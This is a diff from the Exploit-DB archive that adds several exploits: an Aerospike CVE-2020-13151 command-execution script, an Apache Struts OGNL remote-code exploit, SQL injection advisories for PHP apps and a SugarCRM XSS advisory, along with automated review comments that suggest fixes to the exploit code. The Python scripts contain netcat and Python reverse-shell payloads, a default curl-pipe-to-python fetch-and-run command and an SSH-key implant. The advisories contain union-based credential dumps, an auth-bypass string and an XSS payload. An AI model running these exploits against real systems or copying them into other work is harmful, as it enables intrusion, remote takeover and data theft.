DB: 2020-11-18
17 changes to exploits/shellcodes
Internet Explorer 11 - Use-After-Free
Microsoft Internet Explorer 11 - Use-After-Free
LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path
Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption
Aerospike Database 5.1.0.3 - OS Command Execution
Apache Struts 2.5.20 - Double OGNL evaluation
Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)
Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection
EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass
SugarCRM 6.5.18 - Persistent Cross-Site Scripting
WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting
Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting
parent
c7e37046e7
commit
66d1f19fa5
14 changed files with 1478 additions and 182 deletions
175
exploits/multiple/remote/49067.py
Executable file
|
@ -0,0 +1,175 @@
|
|||
# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
|
||||
# Date: 2020-08-01
|
||||
# Exploit Author: Matt S
|
||||
# Vendor Homepage: https://www.aerospike.com/
|
||||
# Version: < 5.1.0.3
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE : CVE-2020-13151
|
||||
|
||||
#!/usr/bin/env python3
|
||||
import argparse
|
||||
import random
|
||||
import os, sys
|
||||
from time import sleep
|
||||
import string
|
||||
|
||||
# requires aerospike package from pip
|
||||
import aerospike
|
||||
# if this isn't installing, make sure os dependencies are met
|
||||
# sudo apt-get install python-dev
|
||||
# sudo apt-get install libssl-dev
|
||||
# sudo apt-get install python-pip
|
||||
# sudo apt-get install zlib1g-dev
|
||||
|
||||
PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&"""
|
||||
NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&'
|
||||
|
||||
def _get_client(cfg):
|
||||
try:
|
||||
return aerospike.client({
|
||||
'hosts': [(cfg.ahost, cfg.aport)],
|
||||
'policies': {'timeout': 8000}}).connect()
|
||||
|
||||
except Exception as e:
|
||||
print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")
|
||||
|
||||
def _send(client, cfg, _cmd):
|
||||
try:
|
||||
print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd]))
|
||||
except Exception as e:
|
||||
print(f"[-] UDF execution returned {e.msg}")
|
||||
|
||||
def _register_udf(client, cfg):
|
||||
try:
|
||||
client.udf_put(cfg.udfpath)
|
||||
except Exception as e:
|
||||
print(f"[-] whoops, couldn't register the udf {cfg.udfpath}")
|
||||
raise e
|
||||
|
||||
def _random_string(l):
|
||||
return ''.join([random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l)])
|
||||
|
||||
def _populate_table(client, cfg):
|
||||
ns = cfg.namespace
|
||||
setname = cfg.setname
|
||||
print(f"[+] writing to {ns}.{setname}")
|
||||
try:
|
||||
rec = cfg.dummystring
|
||||
client.put((ns, setname, rec), {'pk':cfg.dummystring})
|
||||
print(f"[+] wrote {rec}")
|
||||
except Exception as e:
|
||||
print(f"[-] unable to write record: {e.msg}")
|
||||
try:
|
||||
if e.msg.startswith('Invalid namespace'):
|
||||
print("Valid namespaces: ")
|
||||
for n in _info_parse("namespaces", client).split(";"):
|
||||
print(n.strip())
|
||||
except:
|
||||
pass
|
||||
sys.exit(13)
|
||||
|
||||
def _info_parse(k, client):
|
||||
try:
|
||||
return [i[1] for i in client.info_all(k).values() ][0]
|
||||
except Exception as e:
|
||||
print(f"error retrieving information: {e.msg}")
|
||||
return []
|
||||
|
||||
def _is_vuln(_mj, _mi, _pt, _bd):
|
||||
fixed = [5,1,0,0]
|
||||
found = [_mj, _mi, _pt, _bd]
|
||||
|
||||
if fixed == found:
|
||||
return False
|
||||
|
||||
for ix, val in enumerate(found):
|
||||
if val < fixed[ix]:
|
||||
return True
|
||||
elif val == fixed[ix]:
|
||||
pass
|
||||
else:
|
||||
return False
|
||||
|
||||
|
||||
def _version_check(client):
|
||||
print("[+] aerospike build info: ", end="")
|
||||
try:
|
||||
_ver = _info_parse("build", client)
|
||||
print(_ver)
|
||||
mj, mi, pt, bd = [int(i) for i in _ver.split('.')]
|
||||
if _is_vuln(mj, mi, pt, bd):
|
||||
print("[+] looks vulnerable")
|
||||
return
|
||||
else:
|
||||
print(f"[-] this instance is patched.")
|
||||
sys.exit(0)
|
||||
|
||||
except Exception as e:
|
||||
print(f"[+] unable to interpret build number due to {e}")
|
||||
print("[+] continuing anyway... ")
|
||||
|
||||
def _exploit(cfg):
|
||||
client = _get_client(cfg)
|
||||
|
||||
if not client:
|
||||
return
|
||||
|
||||
_version_check(client)
|
||||
|
||||
print(f"[+] populating dummy table.")
|
||||
_populate_table(client, cfg)
|
||||
|
||||
print(f"[+] registering udf")
|
||||
|
||||
_register_udf(client, cfg)
|
||||
|
||||
if cfg.pythonshell or cfg.netcatshell:
|
||||
sys.stdout.flush()
|
||||
print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
|
||||
sys.stdout.flush()
|
||||
for i in range(4):
|
||||
print(".", end="")
|
||||
sys.stdout.flush()
|
||||
sleep(1)
|
||||
|
||||
print(".")
|
||||
_send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) )
|
||||
|
||||
if cfg.cmd:
|
||||
print(f"[+] issuing command \"{cfg.cmd}\"")
|
||||
_send(client, cfg, cfg.cmd)
|
||||
|
||||
if __name__ == '__main__':
|
||||
if len(sys.argv) == 1:
|
||||
print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
|
||||
print("... or ... ")
|
||||
print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
|
||||
sys.exit(0)
|
||||
|
||||
parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC')
|
||||
|
||||
parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
|
||||
parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
|
||||
parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
|
||||
parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
|
||||
parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
|
||||
parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
|
||||
parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
|
||||
parser.add_argument("--lhost", help="host to use for reverse shell callback")
|
||||
parser.add_argument("--lport", help="port to use for reverse shell callback")
|
||||
parser.add_argument("--cmd", help="custom command to issue against the underlying host")
|
||||
parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)
|
||||
|
||||
cfg = parser.parse_args()
|
||||
if not cfg.setname:
|
||||
cfg.setname = 'cve202013151'
|
||||
if not cfg.dummystring:
|
||||
cfg.dummystring = _random_string(16)
|
||||
if not cfg.udfpath:
|
||||
cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')
|
||||
|
||||
assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport"
|
||||
if cfg.pythonshell or cfg.netcatshell:
|
||||
assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"
|
||||
|
||||
_exploit(cfg)
|
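Review bot: Every `except Exception as e` handler in this file reads `e.msg` (`_get_client`, `_send`, `_populate_table`, `_info_parse`), but a plain `Exception` has no `msg` attribute, so any error that is not a client-library error (a socket timeout, a `KeyError`) is replaced by an `AttributeError` raised from inside the handler and the original cause is lost; `print(f"... {getattr(e, 'msg', e)}")` keeps the message in both cases. The fallback in `_populate_table` wraps the namespace listing in a bare `except: pass`, which also hides that `_info_parse` returns `[]` on failure and `.split(";")` on a list raises inside the swallowed block. Argument validation in the `__main__` block uses `assert`, which is stripped under `python -O`; `parser.error("Must specify a command, or a reverse shell + lhost + lport")` reports the same condition reliably. The `#!/usr/bin/env python3` line sits on line 9 of the file, after the header comments, so it is inert and should move to line 1 or be dropped.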
163
exploits/multiple/remote/49068.py
Executable file
|
@ -0,0 +1,163 @@
|
|||
# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation
|
||||
# Date: 08/18/2020
|
||||
# Exploit Author: West Shepherd
|
||||
# Vendor Homepage: https://struts.apache.org/download.cgi
|
||||
# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)
|
||||
# CVE : CVE-2019-0230
|
||||
# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.
|
||||
# Source(s):
|
||||
# https://github.com/PrinceFPF/CVE-2019-0230
|
||||
# https://cwiki.apache.org/confluence/display/WW/S2-059
|
||||
# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22
|
||||
|
||||
# !/usr/bin/python
|
||||
from sys import argv, exit, stdout, stderr
|
||||
import argparse
|
||||
import requests
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
import logging
|
||||
|
||||
|
||||
class Exploit:
|
||||
def __init__(
|
||||
self,
|
||||
target='',
|
||||
redirect=False,
|
||||
proxy_address=''
|
||||
):
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
self.target = target
|
||||
self.session = requests.session()
|
||||
self.redirect = redirect
|
||||
self.timeout = 0.5
|
||||
self.proxies = {
|
||||
'http': 'http://%s' % proxy_address,
|
||||
'https': 'http://%s' % proxy_address
|
||||
} \
|
||||
if proxy_address is not None \
|
||||
and proxy_address != '' else {}
|
||||
self.query_params = {}
|
||||
self.form_values = {}
|
||||
self.cookies = {}
|
||||
boundary = "---------------------------735323031399963166993862150"
|
||||
self.headers = {
|
||||
'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
|
||||
'Accept': '*/*',
|
||||
'Connection': 'close'
|
||||
}
|
||||
payload = "%{(#nike='multipart/form-data')." \
|
||||
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
|
||||
"(#_memberAccess?(#_memberAccess=#dm):" \
|
||||
|
||||
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
|
||||
\
|
||||
|
||||
"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
|
||||
\
|
||||
"(#ognlUtil.getExcludedPackageNames().clear())." \
|
||||
"(#ognlUtil.getExcludedClasses().clear())." \
|
||||
"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \
|
||||
|
||||
"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
|
||||
\
|
||||
|
||||
"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
|
||||
"(#p=new
|
||||
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \
|
||||
|
||||
"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()."
|
||||
\
|
||||
|
||||
"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
|
||||
\
|
||||
"(#ros.flush())}"
|
||||
|
||||
self.payload = "--%s\r\nContent-Disposition: form-data;
|
||||
name=\"foo\"; " \
|
||||
"filename=\"%s\0b\"\r\nContent-Type:
|
||||
text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % (
|
||||
boundary, payload, boundary
|
||||
)
|
||||
|
||||
def do_get(self, url, params=None, data=None):
|
||||
return self.session.get(
|
||||
url=url,
|
||||
verify=False,
|
||||
allow_redirects=self.redirect,
|
||||
headers=self.headers,
|
||||
cookies=self.cookies,
|
||||
proxies=self.proxies,
|
||||
data=data,
|
||||
params=params
|
||||
)
|
||||
|
||||
def do_post(self, url, data=None, params=None):
|
||||
return self.session.post(
|
||||
url=url,
|
||||
data=data,
|
||||
verify=False,
|
||||
allow_redirects=self.redirect,
|
||||
headers=self.headers,
|
||||
cookies=self.cookies,
|
||||
proxies=self.proxies,
|
||||
params=params
|
||||
)
|
||||
|
||||
def debug(self):
|
||||
try:
|
||||
import http.client as http_client
|
||||
except ImportError:
|
||||
import httplib as http_client
|
||||
http_client.HTTPConnection.debuglevel = 1
|
||||
logging.basicConfig()
|
||||
logging.getLogger().setLevel(logging.DEBUG)
|
||||
requests_log = logging.getLogger("requests.packages.urllib3")
|
||||
requests_log.setLevel(logging.DEBUG)
|
||||
requests_log.propagate = True
|
||||
return self
|
||||
|
||||
def send_payload(self, command='curl --insecure -sv
|
||||
https://10.10.10.10/shell.py|python -'):
|
||||
url = self.target
|
||||
stdout.write('sending payload to %s payload %s' % (url, command))
|
||||
resp = self.do_post(url=url, params=self.query_params,
|
||||
data=self.payload.replace('{COMMAND}', command))
|
||||
return resp
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
parser = argparse.ArgumentParser(add_help=True,
|
||||
description='CVE-2020-0230 Struts
|
||||
2 exploit')
|
||||
try:
|
||||
parser.add_argument('-target', action='store', help='Target
|
||||
address: http(s)://target.com/index.action')
|
||||
parser.add_argument('-command', action='store',
|
||||
help='Command to execute: touch /tmp/pwn')
|
||||
parser.add_argument('-debug', action='store', default=False,
|
||||
help='Enable debugging: False')
|
||||
parser.add_argument('-proxy', action='store', default='',
|
||||
help='Enable proxy: 10.10.10.10:8080')
|
||||
|
||||
if len(argv) == 1:
|
||||
parser.print_help()
|
||||
exit(1)
|
||||
options = parser.parse_args()
|
||||
|
||||
exp = Exploit(
|
||||
proxy_address=options.proxy,
|
||||
target=options.target
|
||||
)
|
||||
|
||||
if options.debug:
|
||||
exp.debug()
|
||||
stdout.write('target %s debug %s proxy %s\n' % (
|
||||
options.target, options.debug, options.proxy
|
||||
))
|
||||
|
||||
result = exp.send_payload(command=options.command)
|
||||
stdout.write('Response: %d\n' % result.status_code)
|
||||
|
||||
except Exception as error:
|
||||
|
||||
stderr.write('error in main %s' % str(error))
|
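Review bot: The argparse description in the `__main__` block says `CVE-2020-0230`, while the file header (`# CVE : CVE-2019-0230`) and the S2-059 references name `CVE-2019-0230`; it should read `description='CVE-2019-0230 Struts 2 exploit'` so the `-h` output matches the advisory. `-debug` is declared with `action='store'` and `default=False`, so any value passed — including the literal `False` its help text suggests — is a non-empty string and enables debugging; `parser.add_argument('-debug', action='store_true', help='Enable debugging')` gives the documented boolean. `self.timeout = 0.5` is assigned in `Exploit.__init__` but never passed to `session.get`/`session.post` in `do_get`/`do_post`, so the attribute is dead and the requests run without a timeout. The top-level `except Exception as error` in `__main__` writes the error and then falls off the end, so a failed run still exits with status 0; `exit(1)` after the `stderr.write` would make failures visible to a caller.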
|
@ -34,4 +34,32 @@ $result = mysqli_query($conn,"SELECT * FROM user WHERE id = '$user_id'");
|
|||
..
|
||||
..
|
||||
|
||||
-------------------------------
|
||||
|
||||
Vulnerable param: id
|
||||
-------------------------------------------------------------------------
|
||||
GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 163
|
||||
Origin: http://localhost
|
||||
Connection: close
|
||||
Cookie: COOKIE
|
||||
Upgrade-Insecure-Requests: 1
|
||||
-------------------------------------------------------------------------
|
||||
|
||||
Source Code: \WBS\viewbill.php
|
||||
|
||||
..
|
||||
..
|
||||
..
|
||||
$id =$_REQUEST['id'];
|
||||
$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");
|
||||
..
|
||||
..
|
||||
|
||||
-------------------------------
|
|
@ -1,38 +0,0 @@
|
|||
# Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)
|
||||
# Date: 2020-11-14
|
||||
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
|
||||
# Author ID: 8763
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
|
||||
# Version: 1.0
|
||||
# Tested on: Apache2 and Windows 10
|
||||
|
||||
Vulnerable param: id
|
||||
-------------------------------------------------------------------------
|
||||
GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 163
|
||||
Origin: http://localhost
|
||||
Connection: close
|
||||
Cookie: COOKIE
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
|
||||
-------------------------------------------------------------------------
|
||||
|
||||
Source Code: \WBS\viewbill.php
|
||||
|
||||
..
|
||||
..
|
||||
..
|
||||
$id =$_REQUEST['id'];
|
||||
$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");
|
||||
..
|
||||
..
|
||||
|
||||
-------------------------------
|
|
@ -29,4 +29,27 @@ booking.php:
|
|||
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']);
|
||||
foreach($qry->fetch_array() as $k => $val){
|
||||
$$k=$val;
|
||||
}
|
||||
}
|
||||
|
||||
Vulnerable param: id
|
||||
-------------------------------------------------------------------------
|
||||
GET /car_rental/index.php?page=view_car&id=-3+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+users# HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Cache-Control: max-age=0
|
||||
|
||||
|
||||
Source Code:
|
||||
|
||||
view_car.php:
|
||||
--------------------------------------------------------------------
|
||||
<?php
|
||||
if(isset($_GET['id'])){
|
||||
if(isset($_GET['id'])){
|
||||
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['id']);
|
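--- a/exploits/php/webapps/49058.txt
+++ b/exploits/php/webapps/49058.txt
@@ -0,0 +1,43 @@
+# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass
+# Date: 17-11-2020
+# Exploit Author: Kislay Kumar
+# Vendor Homepage: http://egavilanmedia.com
+# Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-pane=l/
+# Version: N/A (Default)
+# Tested on: Kali Linux
+
+SQL Injection:
+SQL injection is a web security vulnerability that allows an attacker
+to alter the SQL queries made to the database. This can be used to
+retrieve some sensitive information, like database structure, tables,
+columns, and their underlying data.
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection queri=
+es.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/admin/login.html
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: admin' or '1'='1
+
+3. Server accepted our payload and we bypassed admin panel without any
+credentials,
+
+IMPACT:
+if any attacker can gain admin panel access than they can Update &
+Delete Userdata
+
+Suggested Mitigation/Remediation Actions
+Parameterized queries should be used to separate the command and data
+portions of the intended query to the database. These queries prevent
+an attacker from tampering with the query logic and extending a
+concatenated database query string. Code reviews should be conducted
+to identify any additional areas were the application or other
+applications in the organization are vulnerable to this attack.
+Additionally, input validation should be enforced on the server side
+in order to ensure that only expected data is sent in queries. Where
+possible security specific libraries should be used in order to
+provide an additional layer of protection.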
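Review bot: The `Software Link` line and the `Attack Vector` paragraph carry quoted-printable soft-break artifacts (`admin-pane=l/`, and `queri=` followed by `es.` on the next line), which suggests the file was pasted from a QP-encoded e-mail; as committed the vendor URL is broken and presumably should end in `...-with-admin-panel/`, with the paragraph rejoined as `...using malicious sql injection queries.` The step-1 label also has a typo, `URl` for `URL`, and `were the application` in the mitigation section should read `where the application`. The file's `Date: 17-11-2020` uses a different format from the `YYYY-MM-DD` dates in the other advisories of this commit.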
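--- a/exploits/php/webapps/49059.txt
+++ b/exploits/php/webapps/49059.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection
+# Google Dork: N/A
+# Date: 11/16/2020
+# Exploit Author: Ramil Mustafayev
+# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-doctor-appointment-booking-system-php-and-mysql/
+# Software Link: https://projectworlds.in/wp-content/uploads/2020/05/PHP-Doctor-Appointment-System.zip
+# Version: 1.0
+# Tested on: Win10 x64, Kali Linux x64
+# CVE : N/A
+######## Description ########
+#
+# An SQL injection vulnerability was discovered in PHP-Doctor-Appointment-System.
+#
+# In getuser.php file, GET parameter 'q' is vulnerable.
+#
+# The vulnerability could allow for the improper neutralization of special elements in SQL commands and may lead to the product being vulnerable to SQL injection.
+#
+#############################
+
+Vulnerable code:
+
+include_once 'assets/conn/dbconnect.php';
+$q = $_GET['q']; // Vulnerable param
+// echo $q;
+$res = mysqli_query($con,"SELECT * FROM doctorschedule WHERE scheduleDate='$q'"); // Injection point
+
+Used Payload:
+
+http://localhost/[PATH]/getuser.php?q=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20NCHAR%29%2C0x20%29%2C0x7176627871%29%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA%23
+
+Output:
+
+Extracted database: qbqvqdb_healthcareqvbxq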
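Review bot: The advisory quotes the vulnerable line (`$_GET['q']` interpolated straight into the `mysqli_query` string) but, unlike 49058.txt in the same commit, gives no remediation; a short closing `Fix:` line stating that the `scheduleDate` comparison should use `mysqli_prepare` with a bound parameter for `q` instead of string interpolation would round out the advisory. `Date: 11/16/2020` is ambiguous and differs from the `YYYY-MM-DD` format used by 49067.py and 49060.txt in this commit; `2020-11-16` would be consistent.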
366
exploits/php/webapps/49060.txt
Normal file
|
@ -0,0 +1,366 @@
|
|||
# Exploit Title: SugarCRM 6.5.18 - Persistent Cross-Site Scripting
|
||||
# Exploit Author: Vulnerability-Lab
|
||||
# Date: 2020-11-16
|
||||
# Vendor Homepage: https://www.sugarcrm.com
|
||||
# Version: 6.5.18
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
SugarCRM v6.5.18 - (Contacts) Persistent Cross Site Web Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2249
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2020-11-16
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2249
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.1
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
2.000€ - 3.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
SugarCRM empowers your marketing, sales and services teams to
|
||||
collaborate across the entire customer lifecycle for more
|
||||
meaningful, memorable experiences. More than 2 million users in 120
|
||||
countries have switched to SugarCRM to fuel extraordinary
|
||||
customer experiences. We have disrupted the market with a relentless
|
||||
pursuit of innovation and visionary solutions,
|
||||
bringing the world’s first no-touch, time-aware CX platform. The CX
|
||||
suite aggregates the millions of different data points
|
||||
on your customers and turns them into proactive truths, trends and
|
||||
predictions for you to leverage.
|
||||
|
||||
(Copy of the Homepage: https://www.sugarcrm.com )
|
||||
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a persistent
|
||||
cross site scripting web vulnerability in the official SugarCRM v6.5.18
|
||||
web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
SugarCRM
|
||||
Product: SugarCRM v6.5.18 - CRM (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2020-05-03: Researcher Notification & Coordination (Security Researcher)
|
||||
2020-05-04: Vendor Notification (Security Department)
|
||||
2020-05-24: Vendor Notification (Security Department)
|
||||
****-**-**: Vendor Response/Feedback (Security Department)
|
||||
****-**-**: Vendor Fix/Patch (Service Developer Team)
|
||||
****-**-**: Security Acknowledgements (Security Department)
|
||||
2020-11-16: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Guest Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Low User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Independent Security Research
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability has been discovered in
|
||||
the official SugarCRM v6.5.18 web-application.
|
||||
The vulnerability allows remote attackers to inject own malicious script
|
||||
codes with persistent attack vector to
|
||||
compromise browser to web-application requests from the application-side.
|
||||
|
||||
The persistent cross site web vulnerability is located in the primary
|
||||
address state and alternate address state
|
||||
input fields of the sales or support module open to create a contacts.
|
||||
Remote attackers with low privileged
|
||||
sugarcrm accounts are able to inject own malicious script code as
|
||||
contact. Higher privileged application user
|
||||
accounts will execute the script code on preview of the created contact
|
||||
to e.g gain moderator or administrator
|
||||
rights via session hijacking, phishing or further persistent
|
||||
manipulative web attacks. The code does not only
|
||||
execute in the same section were the contact is listed or previewed but
|
||||
also after save in the view log function
|
||||
context. The attack can thus way be performed via create of a contact or
|
||||
via import of a vcf file contact.
|
||||
The request method to inject is POST and the attack is limited to
|
||||
registered user accounts with default
|
||||
contact to the contacts module.
|
||||
|
||||
The script code is able to bypass the basic validation process because
|
||||
of the primary address state and alternate
|
||||
address state are exchanged in the transmit request. Normally in a
|
||||
regular transmit the context is parsed securely.
|
||||
In the actual case an attacker injects script code in the alternate
|
||||
adress when changing the main adress the wrong
|
||||
sanitized code occurs in the front-end.
|
||||
|
||||
Successful exploitation of the vulnerability results in session
|
||||
hijacking, persistent phishing attacks, persistent
|
||||
external redirects to malicious source and persistent manipulation of
|
||||
affected application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Sales
|
||||
[+] Support
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Primary Address State
|
||||
[+] Alternate Address State
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] primary address state
|
||||
[+] alternate address state
|
||||
|
||||
Affected Module(s):
|
||||
[+] Sales - Contact List
|
||||
[+] Support - Contact List
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent input validation web vulnerability can be exploited by
|
||||
remote attackers with low privileged user account and with low user
|
||||
interaction.
|
||||
For security demonstration or to reproduce the persistent cross site web
|
||||
vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Manual steps to reproduce the vulnerability ...
|
||||
1. Open the sugarcrm application
|
||||
2. Login as low privileged user account
|
||||
3. Move to sales or support and click to contact, then open create a new
|
||||
contact
|
||||
4. Inject payload in the other address and primary adress to the
|
||||
alternate address state and primary state input fields
|
||||
5. Save the entry and a refresh occurs with the inserted contact details
|
||||
Note: The script code execute immediatly after saving in the primary
|
||||
adress state and alternate adress state section of both modules
|
||||
6. Successful reproduce of the persistent cross site scripting web
|
||||
vulnerability!
|
||||
|
||||
|
||||
PoC: Payload
|
||||
><iframe src=evil.source onload=alert(document.domain)>
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
<tr><td scope="col" width="12.5%">
|
||||
Primary Address:
|
||||
</td>
|
||||
<td width="37.5%">
|
||||
<table width="100%" cellspacing="0" cellpadding="0" border="0">
|
||||
<tbody><tr>
|
||||
<td width="99%">
|
||||
<input type="hidden" class="sugar_field" id="primary_address_street"
|
||||
value="q">
|
||||
